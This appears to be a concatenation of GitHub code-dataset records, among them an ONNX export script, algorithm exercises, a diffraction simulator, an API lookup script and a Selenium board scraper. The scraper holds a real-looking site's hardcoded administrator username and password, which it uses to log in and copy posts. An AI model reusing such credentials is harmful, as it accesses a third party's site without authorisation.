== 9:\n end = ',\\n'\n else:\n end = ', '\n print(f'\\'{log}\\'', end=end)\n\n # Remove unused initializers and value infos\n cleaned_values = _remove_unused_values(model.graph)\n print(f'| clean value(s):')\n for i, log in enumerate(cleaned_values):\n if i == len(cleaned_values) - 1:\n end = '\\n'\n elif i % 15 == 14:\n end = ',\\n'\n else:\n end = ', '\n print(f'\\'{log}\\'', end=end)\n\n # Run #2 of the simplifier to further optimize the graph and reduce dangling sub-graphs.\n print('Running ONNX simplifier...')\n model, check = onnxsim.simplify(model, include_subgraph=True)\n assert check, 'Simplified ONNX model could not be validated'\n\n onnx.save(model, target)\n print('Graph fixed and optimized.')\n\n\ndef export(model_path):\n set_hparams(print_hparams=False)\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n decoder = DiffDecoder(device)\n n_frames = 10\n\n with torch.no_grad():\n shape = (1, 1, hparams['audio_num_mel_bins'], n_frames)\n noise_t = torch.randn(shape, device=device)\n noise_list = torch.randn((3, *shape), device=device)\n condition = torch.rand((1, hparams['hidden_size'], n_frames), device=device)\n step = (torch.rand((), device=device) * hparams['K_step']).long()\n speedup = (torch.rand((), device=device) * step / 10.).long()\n step_prev = torch.maximum(step - speedup, torch.tensor(0, dtype=torch.long, device=device))\n\n print('Tracing modules...')\n decoder.model.denoise_fn = torch.jit.trace(\n decoder.model.denoise_fn,\n (\n noise_t,\n step,\n condition\n )\n )\n decoder.model.naive_noise_predictor = torch.jit.trace(\n decoder.model.naive_noise_predictor,\n (\n noise_t,\n noise_t,\n step\n ),\n check_trace=False\n )\n decoder.model.plms_noise_predictor = torch.jit.trace_module(\n decoder.model.plms_noise_predictor,\n {\n 'forward': (\n noise_t,\n noise_t,\n step,\n step_prev\n ),\n 'predict_stage0': (\n noise_t,\n noise_t\n ),\n 'predict_stage1': (\n noise_t,\n noise_list\n ),\n 'predict_stage2': (\n noise_t,\n noise_list\n ),\n 'predict_stage3': (\n noise_t,\n noise_list\n ),\n }\n )\n decoder.model.mel_extractor = torch.jit.trace(\n decoder.model.mel_extractor,\n (\n noise_t\n )\n )\n\n decoder = torch.jit.script(decoder)\n condition = torch.rand((1, n_frames, hparams['hidden_size']), device=device)\n speedup = torch.tensor(10, dtype=torch.long, device=device)\n dummy = decoder.forward(condition, speedup)\n\n torch.onnx.export(\n decoder,\n (\n condition,\n speedup\n ),\n model_path,\n input_names=[\n 'condition',\n 'speedup'\n ],\n output_names=[\n 'mel'\n ],\n dynamic_axes={\n 'condition': {\n 1: 'n_frames'\n }\n },\n opset_version=11,\n example_outputs=(\n dummy\n )\n )\n print('PyTorch ONNX export finished.')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Export diffusion decoder to ONNX')\n parser.add_argument('--exp', type=str, required=True, help='Experiment to export')\n parser.add_argument('--target', required=False, type=str, help='Path of the target ONNX model')\n args = parser.parse_args()\n\n cwd = os.getcwd()\n if args.target:\n target = os.path.join(cwd, args.target)\n else:\n target = None\n os.chdir(root_dir)\n exp = args.exp\n sys.argv = [\n 'inference/ds_cascade.py',\n '--config',\n f'checkpoints/{exp}/config.yaml',\n '--exp_name',\n exp\n ]\n\n path = f'onnx/assets/{exp}.onnx' if not target else target\n export(path)\n fix(path, path)\n\n os.chdir(cwd)\n if args.target:\n log_path = os.path.abspath(args.target)\n else:\n log_path = path\n print(f'| export \\'model\\' to \\'{log_path}\\'.')\n","repo_name":"kongjian123/DiffSinger","sub_path":"onnx/export/export_diff_decoder.py","file_name":"export_diff_decoder.py","file_ext":"py","file_size_in_byte":36468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"40662857949","text":"def qsort(a, start, end):\n \"\"\" quicksort in O(nlogn), no extra memory, in-place\"\"\"\n if start < end:\n p = choosepivot(start, end)\n if p != start:\n a[p], a[start] = a[start], a[p]\n equal = partition(a, start, end)\n qsort(a, start, equal-1)\n qsort(a, equal+1, end)\ndef partition(a, l, r):\n pivot, i = a[l], l+1\n for j in range(l+1, r+1):\n if a[j] <= pivot:\n a[i],a[j] = a[j],a[i]\n i += 1\n # swap pivot to its correct place\n a[l], a[i-1] = a[i-1], a[l]\n return i-1\ndef choosepivot(s, e):\n return randint(s,e)","repo_name":"bdlm-dev/Competitive-Programming-Codebook","sub_path":"content/flow/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"71570507848","text":"import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nX = tf.constant([2013, 2014, 2015, 2016, 2017])\nY = tf.constant([12000, 14000, 15000, 16500, 17500])\n\ndataset = tf.data.Dataset.from_tensor_slices((X, Y))\n\nfor x, y in dataset:\n print(x.numpy(), y.numpy())\n\n(trainData, trainLabel), (_, _) = tf.keras.datasets.mnist.load_data()\n\ntrainData = np.expand_dims(trainData.astype(np.float32) / 255.0, axis=-1)\nmnist_dataset = tf.data.Dataset.from_tensor_slices((trainData, trainLabel))\n\nfor image, label in mnist_dataset:\n plt.title(label.numpy())\n plt.imshow(image.numpy()[:, :, 0])\n plt.show()\n break\n\n\n# Map\ndef rot90(ima, lab):\n ima = tf.image.rot90(ima)\n return ima, lab\n\n\nmnist_dataset = mnist_dataset.map(rot90)\n\n# Shuffle\n\n# Batch\nmnist_dataset = mnist_dataset.batch(4)\nfor images, labels in mnist_dataset:\n fig, axs = plt.subplots(1, 4)\n for i in range(4):\n axs[i].set_title(labels.numpy()[i])\n axs[i].imshow(images.numpy()[i, :, :, 0])\n plt.show()\n break;\n\n# Repeat\n\n# Reduce\n\n# Take\n","repo_name":"xin-pu/TFLearning","sub_path":"BasciTF/Data/DataSet.py","file_name":"DataSet.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2887688104","text":"#!/usr/bin/env python3\nfrom __future__ import absolute_import, division, print_function\nimport iotbx.pdb\nimport iotbx.mrcfile\nfrom scitbx.array_family import flex\nfrom cctbx.development import random_structure\nfrom cctbx import sgtbx\nfrom cctbx import maptbx\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom random import randrange\nfrom multiprocessing import Pool\nimport time\nfrom scipy.stats import truncnorm\n\nimport matplotlib.pyplot as plt\n\nnp.random.seed(5)\n\nlambd = 1.540596\n\ndef fwhm(peak, lh = 10*0.437, Lam = 1.540596):\n Rad2 = 360 / np.pi\n return lh / 10**3 / Lam * np.tan(peak / Rad2) * Rad2\n\ndef LP_Factor(Th2, CeV = 0):\n Deg = np.pi / 180\n A = np.cos(CeV*Deg)**2\n return (1 + A * np.cos(Th2*Deg) ** 2) / (1 + A) / np.sin(Th2*Deg)\n\ndef lorenz(Th2, peak, peak_i):\n return (2 / np.pi / fwhm(peak_i)) / (1 + 4 * (Th2 - peak)**2 / fwhm(peak_i)**2)\n\ndef h(phi, peak):\n return L*np.sqrt(np.cos(phi*np.pi/180)**2/np.cos(peak*np.pi/180)**2 - 1)\ndef phi_min(peak):\n return 180/np.pi*np.arccos(np.cos(peak*np.pi/180)*np.sqrt( ((H+S)/L)**2 + 1 ))\ndef phi_infl(peak):\n return 180/np.pi*np.arccos(np.cos(peak*np.pi/180)*np.sqrt( ((H-S)/L)**2 + 1 ))\ndef W(phi, peak):\n if phi < phi_min(peak):\n return 0\n if phi_min(peak) <= phi <= phi_infl(peak):\n return H + S - h(phi, peak)\n if phi_infl(peak) <= phi <= peak:\n return 2*min(H, S)\n if phi > peak:\n return 0\n\ndef W2(phis, peak):\n result = np.zeros(len(phis))\n cond1 = (phi_min(peak) <= phis) & (phis <= phi_infl(peak))\n result[cond1] = H + S - h(phis[cond1], peak)\n cond2 = (phis > phi_infl(peak)) & (phis <= peak)\n result[cond2] = 2 * min(H, S)\n return result\n\ndef pool_peaks(peak_i):\n peak = theta_peaks[peak_i]\n a, b = np.where(peak - 3 <= theta2)[0][0], np.where(theta2 <= peak + 3)[0][-1]\n peak_index = np.where(theta2 <= peak)[0][-1]\n #tmp = tmp / np.sum(tmp) / step * factors[peak_i]\n if peak < 10:\n N_gauss = 20\n elif peak < 30:\n N_gauss = 14\n elif peak < 70:\n N_gauss = 7\n else:\n N_gauss = 4\n xn, wn = np.polynomial.legendre.leggauss(N_gauss)\n deltan = (peak+phi_min(peak))/2 + (peak-phi_min(peak))*xn/2\n tmp_assy = np.zeros(len(theta2[a:b]))\n i = 0\n for phi in theta2[a:b]:\n # print(deltan)\n if phi == theta2[peak_index]:\n xn, wn = np.polynomial.legendre.leggauss(20)\n deltan = (peak+phi_min(peak))/2 + (peak-phi_min(peak))*xn/2\n sum1 = np.sum(wn*W2(deltan, peak)*lorenz(phi, deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180))\n sum2 = np.sum(wn*W2(deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180))\n tmp_assy[i] = sum1/sum2\n i = i+1\n tmp_assy = tmp_assy / np.sum(tmp_assy) / step * factors[peak_i]\n #y += y_tmp\n #print(y)\n return (a, b, tmp_assy)\n\ndef pool_peaks2(peak_i):\n peak = theta_peaks[peak_i]\n a, b = np.where(peak - 3 <= theta2)[0][0], np.where(theta2 <= peak + 3)[0][-1]\n peak_index = np.where(theta2 <= peak)[0][-1]\n #tmp = tmp / np.sum(tmp) / step * factors[peak_i]\n if peak < 10:\n N_gauss = 30\n elif peak < 30:\n N_gauss = 20\n elif peak < 70:\n N_gauss = 20\n else:\n N_gauss = 20\n xn, wn = np.polynomial.legendre.leggauss(N_gauss)\n deltan = (peak+phi_min(peak))/2 + (peak-phi_min(peak))*xn/2\n tmp_assy = np.zeros(len(theta2[a:b]))\n i = 0\n sum2 = np.sum(wn*W2(deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180))\n arr1 = wn*W2(deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180)\n for phi in theta2[a:b]:\n # print(deltan)\n sum1 = np.sum(arr1 * lorenz(phi, deltan, peak))\n tmp_assy[i] = sum1/sum2\n i = i+1\n tmp_assy = tmp_assy / np.sum(tmp_assy) / step * factors[peak_i]\n #y += y_tmp\n #print(y)\n return (a, b, tmp_assy)\n #y_none[a:b] += tmp\n\n\ndef truncated_normal(mean, stddev, minval, maxval, n):\n a, b = (minval - mean) / stddev, (maxval - mean) / stddev\n r = truncnorm(a,b, loc = mean, scale = stddev)\n return(r.rvs(n))\n\n\ndef dmin (angle = 90):\n return lambd / np.sin(angle/180*np.pi) / 2\n\ndef XRS(groups, cell, elemental):\n xrs = random_structure.xray_structure(\n space_group_info = sgtbx.space_group_info(groups),\n elements = elemental,\n unit_cell = cell)\n a = xrs.structure_factors(d_min= dmin()).f_calc().sort()\n I = a.as_intensity_array().data().as_numpy_array()\n m = a.multiplicities().data().as_numpy_array()\n for i in range(len(m)):\n I[i] *= m[i]\n Ind = list(a.indices())\n D = a.d_spacings().data().as_numpy_array()\n T2 = a.two_theta(lambd, deg = True).data().as_numpy_array()\n return I, Ind, D, T2\n\n\nif __name__ == '__main__':\n N = 3 #number of pictures\n\n cell_a = truncated_normal(10.05493, 2.792331, 2, 10000, N)\n cell_b = truncated_normal(12.18931, 3.201324, 2, 10000, N)\n cell_c = truncated_normal(15.10612, 4.623489, 2, 10000, N)\n angle_a = truncated_normal(90, 13.83713, 40, 140, N)\n angle_b = truncated_normal(90, 11.86436, 40, 140, N)\n angle_c = truncated_normal(90, 14.70701, 40, 140, N)\n\n\n\n #setting parameters for assymetry\n L, H, S = 720, 7.5, 10.7\n cells = list(zip(cell_a, cell_b, cell_c, angle_a, angle_b, angle_c))\n groups = \"P-1\" #setting for groups\n elemental = [[\"C\"]*randrange(6, 15) for i in range(N)] #setting for elemets\n for i in range(N):\n factors, index, d_s, theta_peaks = XRS(groups, cells[i], elemental[i])\n theta2 = np.arange(1, 90, 0.005)\n theta_peaks = theta_peaks[theta_peaks < 89] # берем только нужные пики\n #print(range(len(theta_peaks)))\n step = theta2[1] - theta2[0]\n y = np.zeros(len(theta2))\n #y_none = np.zeros(len(theta2))\n\n with Pool(processes = 8) as p:\n z = p.map(pool_peaks2, range(len(theta_peaks))) #ассиметрия пиков\n #print(z)\n for j in z:\n y[j[0]:j[1]] += j[2]\n #print(y_end)\n #y.wait()\n y = np.multiply(y, LP_Factor(theta2))\n #print(y_end)\n #y_none = np.multiply(y_none, LP_Factor(theta2))\n coeffs = np.random.normal(loc = 0, scale = 1, size = 14)\n xx = np.linspace(-1, 1, len(theta2))\n yy = np.polynomial.chebyshev.chebval(xx, coeffs)\n a, b = 0.2, 90\n x1, x2 = -1, 1 #background\n xx = (a - b)/(x1 - x2)*xx + (b*x1-a*x2)/(x1-x2)\n a, b = 0, 25000\n y1, y2 = np.min(yy), np.max(yy)\n yy = (a - b)/(y1 - y2)*yy + (b*y1-a*y2)/(y1-y2)\n y += yy\n #y_none += yy\n file = open('./cryst_edit'+str(i)+'.txt', 'w')\n for j in range(0, len(theta2), 1):\n file.write(str(theta2[j])+ ' ' + str(y[j]))\n file.write('\\n')\n file.close()\n","repo_name":"blackwood168/random_diffraction","sub_path":"random_proga_pool_edit.py","file_name":"random_proga_pool_edit.py","file_ext":"py","file_size_in_byte":6851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"19910228869","text":"import requests\nimport json\nimport time\nimport pandas\n\ndef importar_csv(endereco):\n tabela = pandas.read_excel(endereco)\n total_cnpj = []\n for linha in tabela['cnpj']:\n total_cnpj.append(str(linha).rjust(14, '0'))\n return total_cnpj\n\ndef cria_arquivo(endereco):\n # Criar um arquivo\n arquivo = open(endereco, 'w')\n #arquivo.write(texto)\n arquivo.close()\n\ndef atualizar_arquivo(endereco, lista):\n arquivo = open(endereco, 'a')\n for i in range(len(lista)):\n valor = lista[i]\n arquivo.write(valor + ',')\n arquivo.write('\\n')\n #print(lista)\n arquivo.close()\n\ndef ler_arquivo(endereco):\n arquivo = open(endereco, 'r')\n texto = arquivo.read()\n print(texto)\n\n#Consulta limitada a 3 CNPJs por minuto\n#https://www.sintegraws.com.br/api/documentacao-api-receita-federal.php\ndef api_cnpj(lista_cnpj, loop):\n lista_dados = []\n for cnpj in lista_cnpj:\n url = f\"https://receitaws.com.br/v1/cnpj/{cnpj}\"\n querystring = {\"token\":\"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\"cnpj\":\"06990590000123\",\"plugin\":\"RF\"}\n try:\n consulta = requests.request(\"GET\", url, params=querystring)\n dado = json.loads(consulta.text)\n # API acessada com sucesso.\n ativ1 = dado['atividade_principal']\n cnae_cod1 = ativ1[0]['code'].replace(\",\",\";\")\n cnae_text1 = ativ1[0]['text'].replace(\",\",\";\")\n cont = 0\n ativ2 = dado['atividades_secundarias']\n while cont < len(ativ2):\n if cont == 0:\n cnae_cod2 = ativ2[cont]['code'].replace(\",\",\";\")\n cnae_text2 = ativ2[cont]['text'].replace(\",\",\";\")\n else:\n cnae_cod2 = cnae_cod2 + ',' + ativ2[cont]['code'].replace(\",\",\";\")\n cnae_text2 = cnae_text2 + ',' + ativ2[cont]['text'].replace(\",\",\";\")\n cont = cont + 1\n\n lista_dados.append(\n [\n dado['cnpj'],\n dado['nome'],\n # dado['numero'],\n # dado['complemento'],\n dado['cep'],\n # dado['bairro'],\n dado['municipio'],\n dado['uf'],\n # dado['email'],\n # dado['telefone']\n #cnae_cod1,\n #cnae_text1,\n #cnae_cod2,\n #cnae_text2\n ]\n )\n except Exception as erro:\n lista_dados.append(\n [\n 'erro',\n 'erro',\n 'erro',\n 'erro',\n 'erro',\n 'erro'\n ]\n )\n #Pausa no cod devido limite de consulta de 3 CNPJs por min\n if loop >3:\n time.sleep(70)\n\n return lista_dados\n\ndiretorio = 'C:/Users/andremt/OneDrive - Votorantim/Documentos/Python/'\n\n#Buscar xlsx com os CNPJs\nnome_arquivo = 'Lista_CNPJ.xlsx'\nendereco = diretorio + nome_arquivo\ntotal_cnpj = importar_csv(endereco)\n\n#Arquivo que retornará valores da consulta\nnome_arquivo = 'CNPJs.txt'\nendereco = diretorio + nome_arquivo\ncria_arquivo(endereco)\n\nlista_cnpj = []\ni=0\n\nwhile i <= len(total_cnpj):\n lista_cnpj = total_cnpj[i:i+3]\n i += 3\n print(lista_cnpj)\n lista_dados = api_cnpj(lista_cnpj, len(total_cnpj))\n j=0\n for j in range(len(lista_dados)):\n atualizar_arquivo(endereco, lista_dados[j])","repo_name":"AndreTsuji/estudo-python","sub_path":"api_cnpj.py","file_name":"api_cnpj.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6817600749","text":"#! /usr/bin/python3\n\nimport json\nimport sys\n\nwith open(\"cgminer.conf\", \"w\") as file:\n try:\n cgminerconf = json.load(sys.stdin)\n except:\n file.close()\n exit(1)\n file.write(json.dumps(cgminerconf, indent=4, separators=(',', ':'), sort_keys=True))\n file.close()\n\n","repo_name":"arijan/cgmrrd","sub_path":"putconf.py","file_name":"putconf.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"71134794248","text":"from random import randint, shuffle, seed\r\n\r\n\r\ndef partition(T, p, r):\r\n T[p], T[r] = T[r], T[p]\r\n x = T[r]\r\n i = p-1\r\n for j in range(p, r):\r\n if T[j] < x:\r\n i += 1\r\n T[i], T[j] = T[j], T[i]\r\n T[r], T[i+1] = T[i+1], T[r]\r\n return i+1\r\n\r\n\r\ndef median_of_five(T, p, r, step):\r\n for i in range(r, p, -step):\r\n for j in range(p, i, step):\r\n if T[j] > T[j+step]:\r\n T[j], T[j+step] = T[j+step], T[j]\r\n tmp = p+step*(((r-p)//step)//2)\r\n T[p], T[tmp] = T[tmp], T[p]\r\n\r\n\r\ndef select(T, p, r):\r\n step = 1\r\n while r-p >= step:\r\n for i in range(p, r, 5*step):\r\n median_of_five(T, i, min(i+5*step-1, r), step)\r\n step *= 5\r\n r = r-r % (step)\r\n\r\n\r\ndef linearselect(T, k):\r\n p = 0\r\n r = len(T)-1\r\n while True:\r\n select(T, p, r)\r\n q = partition(T, p, r)\r\n if q == k:\r\n return T[q]\r\n elif k < q:\r\n r = q-1\r\n else:\r\n p = q+1\r\n\r\n\r\nseed(42)\r\n\r\nn = 11\r\nfor i in range(n):\r\n A = list(range(n))\r\n shuffle(A)\r\n print(A)\r\n x = linearselect(A, i)\r\n if x != i:\r\n print(\"Blad podczas wyszukiwania liczby\", i)\r\n exit(0)\r\n\r\nprint(\"OK\")\r\n","repo_name":"BlazejNowicki/ASD","sub_path":"offline/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"23126656402","text":"from bayserver_core.bay_log import BayLog\nfrom bayserver_core.sink import Sink\nfrom bayserver_core.protocol.command_unpacker import CommandUnPacker\n\nfrom bayserver_docker_ajp.ajp_type import AjpType\nfrom bayserver_docker_ajp.command.cmd_data import CmdData\nfrom bayserver_docker_ajp.command.cmd_end_response import CmdEndResponse\nfrom bayserver_docker_ajp.command.cmd_forward_request import CmdForwardRequest\nfrom bayserver_docker_ajp.command.cmd_get_body_chunk import CmdGetBodyChunk\nfrom bayserver_docker_ajp.command.cmd_send_body_chunk import CmdSendBodyChunk\nfrom bayserver_docker_ajp.command.cmd_send_headers import CmdSendHeaders\nfrom bayserver_docker_ajp.command.cmd_shutdown import CmdShutdown\n\nclass AjpCommandUnPacker(CommandUnPacker):\n\n def __init__(self, handler):\n self.cmd_handler = handler\n self.reset()\n\n def reset(self):\n pass\n\n def packet_received(self, pkt):\n\n BayLog.debug(\"ajp: packet received: type=%d data len=%d\", pkt.type, pkt.data_len())\n\n if pkt.type == AjpType.DATA:\n cmd = CmdData()\n\n elif pkt.type == AjpType.FORWARD_REQUEST:\n cmd = CmdForwardRequest()\n\n elif pkt.type == AjpType.SEND_BODY_CHUNK:\n cmd = CmdSendBodyChunk(pkt.buf, pkt.header_len, pkt.data_len)\n\n elif pkt.type == AjpType.SEND_HEADERS:\n cmd = CmdSendHeaders()\n\n elif pkt.type == AjpType.END_RESPONSE:\n cmd = CmdEndResponse()\n\n elif pkt.type == AjpType.SHUTDOWN:\n cmd = CmdShutdown()\n\n elif pkt.type == AjpType.GET_BODY_CHUNK:\n cmd = CmdGetBodyChunk()\n\n else:\n raise Sink()\n\n cmd.unpack(pkt)\n return cmd.handle(self.cmd_handler) # visit\n\n def need_data(self):\n return self.cmd_handler.need_data()\n","repo_name":"baykit/BayServer_Python","sub_path":"packages/bayserver-docker-ajp/bayserver_docker_ajp/ajp_command_unpacker.py","file_name":"ajp_command_unpacker.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36173358057","text":"# Átváltás római számról arab számra\r\n\r\n# Római számjegyek\r\nromai = {'I':1,\r\n 'V':5,\r\n 'X':10,\r\n 'L':50,\r\n 'C':100,\r\n 'D':500,\r\n 'M':1000}\r\n\r\nwhile True:\r\n # Beolvasás\r\n be = input('Római szám: ').upper()\r\n if be == '':\r\n break\r\n # Számjegyek értéke\r\n \r\n # számjegyek előjele\r\n \r\n # Összegzés és kiírás\r\n \r\n","repo_name":"radamhu/prog101","sub_path":"python101/python2/16 Szótárak 1/Források/romai.py","file_name":"romai.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36713052941","text":"class LinkedList:\n def __init__(self):\n \"\"\"Initializes an empty linked list with a null head\"\"\"\n self.head = None\n\n def kth_from_end(self, k):\n \"\"\"\n Takes an integer k as input and returns the value of the node that is k places from the tail of the linked list.\n\n Args:\n k (int): The index of the node from the tail of the linked list.\n\n Returns:\n int: The value of the node that is k places from the tail of the linked list.\n\n Raises:\n ValueError: If k is less than 0 or greater than the length of the linked list.\n \"\"\"\n if k < 0:\n raise ValueError(\"k must be a positive integer\")\n\n p1 = self.head\n p2 = self.head\n\n for i in range(k):\n if p1 is None:\n raise ValueError(\"k is greater than the length of the linked list\")\n p1 = p1.next\n\n if p1 is None:\n return self.head.value\n\n while p1.next is not None:\n p1 = p1.next\n p2 = p2.next\n\n return p2.value\n\n def find_middle(self):\n \"\"\"\n Returns the value of the node at the middle of the linked list.\n\n Returns:\n int: The value of the node at the middle of the linked list.\n\n \"\"\"\n if self.head is None:\n return None\n\n p1 = self.head\n p2 = self.head\n\n while p1 is not None and p1.next is not None:\n p1 = p1.next.next\n p2 = p2.next\n\n return p2.value\n","repo_name":"mohammadalsmadi2000/data-structures-and-algorithms","sub_path":"linked-list-kth/linked-list-kth/linked-list-kth.py","file_name":"linked-list-kth.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6977416249","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\nimport os\nimport stdlib\nfrom stdlib.template.configure import configure\nfrom stdlib.template import autotools\nfrom stdlib.manifest import manifest\n\n\n@manifest(\n name='sqlite',\n category='dev-libs',\n description='''\n A C library that implements a self-contained, serverless, zero-configuration, transactional SQL database engine.\n ''',\n tags=['sql', 'db'],\n maintainer='grange_c@raven-os.org',\n licenses=[stdlib.license.License.PUBLIC_DOMAIN],\n upstream_url='https://www.sqlite.org/',\n kind=stdlib.kind.Kind.EFFECTIVE,\n versions_data=[\n {\n 'semver': '3.30.1',\n 'fetch': [{\n 'url': 'https://sqlite.org/2019/sqlite-autoconf-3300100.tar.gz',\n 'sha256': '8c5a50db089bd2a1b08dbc5b00d2027602ca7ff238ba7658fabca454d4298e60',\n }],\n },\n ],\n)\ndef build(build):\n os.environ['CFLAGS'] += '''\\\n -DSQLITE_ENABLE_FTS3=1 \\\n -DSQLITE_ENABLE_FTS4=1 \\\n -DSQLITE_ENABLE_COLUMN_METADATA=1 \\\n -DSQLITE_ENABLE_UNLOCK_NOTIFY=1 \\\n -DSQLITE_ENABLE_DBSTAT_VTAB=1 \\\n -DSQLITE_SECURE_DELETE=1 \\\n -DSQLITE_ENABLE_FTS3_TOKENIZER=1\\\n '''\n\n return autotools.build(\n configure=lambda: configure(\n '--enable-fts5',\n )\n )\n","repo_name":"raven-os/nbuild-manifests","sub_path":"dev-libs/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"45120930295","text":"import requests, xmltodict, json\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nfrom urllib import parse\r\nimport datetime as dt\r\nimport urllib3\r\nimport traceback\r\nimport os\r\nimport openpyxl\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import urljoin\r\nfrom selenium import webdriver\r\n\r\n#공지사항에 쓰임 목적에따라 달라질 수 있음\r\nfrom selenium.common import UnexpectedAlertPresentException\r\n\r\n\r\ndef void(): #main 격의 자리이며 그외 함수는 이 위에 def로 지정\r\n while True:\r\n try:\r\n print(\"hello\")\r\n c = input(\"종료하려면 x를 누르세요 : \")\r\n if c == 'x':\r\n break\r\n time.sleep(1)\r\n\r\n ### 로그인 창 ###\r\n\r\n USER=\"admin\"\r\n PW=\"adminadmin\"\r\n\r\n urls = 'https://www.costac.co.kr/bbs/login.php'\r\n driver = webdriver.Chrome('C:/Users/skflc/PycharmProjects/pythonProject/chromedriver_win32/chromedriver.exe')\r\n driver.get(urls)\r\n\r\n driver.find_element_by_id('login_id').send_keys('admin')\r\n driver.find_element_by_id('login_pw').send_keys('adminadmin')\r\n driver.find_element_by_css_selector('#login_fs > input.btn_submit').click()\r\n\r\n aaa = input(\"종료하려면 x를 누르세요 : \")\r\n if aaa == 'x':\r\n break\r\n #이상 로그인 및 테스트구역\r\n mCols = []\r\n df = pd.DataFrame(columns=mCols)\r\n excel_file = openpyxl.Workbook()\r\n excel_sheet = excel_file.active\r\n excel_sheet.title = '테스트'\r\n excel_sheet.append(['이', '액셀은', '역순으로', '작성', '되었음', '22-06-20']) # 정순처리시 주석\r\n excel_sheet.append(['번호', '제목', '내용(selectone)', '내용(select)', '작성자', '작성시각'])\r\n dir = 'C:\\\\Users\\\\skflc\\\\Desktop\\\\test0615\\\\testS0624Fin.xlsx'\r\n btitles = []\r\n brticles = []\r\n brticles2 = []\r\n buths = []\r\n btimes = []\r\n\r\n j = 1 # 글번호\r\n\r\n # 여기서 부터 반복문\r\n for i in range(820, 3, -1): #정순은 4,813\r\n try:\r\n jj = str(j)\r\n ii = str(i)\r\n url = 'https://www.costac.co.kr/bbs/board.php?bo_table=form_service&wr_id=' + ii\r\n #url = 'https://www.costac.co.kr/bbs/board.php?bo_table=sim_report&wr_id=' + ii\r\n print(url)\r\n # source = requests.get(url, verify=False)\r\n source = driver.get(url)\r\n\r\n # 분기점 source.status_code\r\n\r\n # html = source.text\r\n html = driver.page_source\r\n soap = BeautifulSoup(html, 'html.parser')\r\n article = soap.select_one('#bo_v_con')\r\n article2 = soap.select('#bo_v_con')\r\n title = soap.select_one('#bo_v_title') # 제목\r\n auth = soap.select_one('#bo_v_info > ul > li:nth-child(1) > strong > span') # 작성자\r\n wtime = soap.select_one('#bo_v_info > ul > li:nth-child(2) > strong') # 작성시각\r\n\r\n #제목 작성자, 작성시각은 gettext를 들어감\r\n # form_result > table\r\n # form_result > div:nth-child(2) > table.table1\r\n # form_result > div:nth-child(4) > table\r\n # form_result > div:nth-child(2) > table.gunmul\r\n # table/table1,gunmul,table3,gdTable\r\n # content > section > article > form > div > table:nth-child(1)\r\n\r\n\r\n\r\n # time.sleep(1)\r\n\r\n ## print(soap)\r\n # print('-----------------------------')\r\n # print(article)\r\n # print('-----------------------------')\r\n ## print(article.get_text())\r\n brticle = str(article)\r\n brticle2 = str(article2)\r\n crticle = article.text\r\n drticle = article.string\r\n\r\n\r\n\r\n #btitle = str(title)\r\n #buth = str(auth)\r\n #btime = str(wtime)\r\n btitle = title.get_text()\r\n buth = auth.get_text()\r\n btime = wtime.get_text()\r\n btime = '20'+btime+' 00:00:'+str(i//180)+str(i%10)\r\n #print(btime)\r\n\r\n #time.sleep(20)\r\n excel_sheet.append([jj, btitle, brticle, brticle2, buth, btime])\r\n btitles.append(btitle)\r\n brticles.append(brticle)\r\n brticles2.append(brticle2)\r\n buths.append(buth)\r\n btimes.append(btime)\r\n\r\n #excel_sheet.append(['공백'])\r\n print('-----------'+jj + '번째 실행------------------------------------------------------------------------------------------------------------------------')\r\n print(brticle + \" \" + brticle2 + \" \" + buth + \" \" + btime + \" \" + btitle)\r\n j = j + 1\r\n\r\n # time.sleep(2) # 원인이 시간이 이유라면? 아니다 다만\r\n\r\n #eee = input(\"종료하려면 x를 누르세요 : \")\r\n\r\n #if eee == 'x':\r\n #break\r\n except UnexpectedAlertPresentException as UAPE:\r\n print(UAPE)\r\n print(\"일시적인 오류이거나 글이 존재하지 않습니다.\")\r\n print(url)\r\n time.sleep(1)\r\n excel_sheet.append(['오류'])\r\n continue\r\n # pass\r\n\r\n ## source = requests.get(url, verify=False)\r\n\r\n ## article = soap2.select_one('#bo_v_con')\r\n ## article2 = soap2.select_one('#bo_v_atc')\r\n\r\n\r\n\r\n\r\n time.sleep(1)\r\n # 글내용 bo_v_con\r\n\r\n 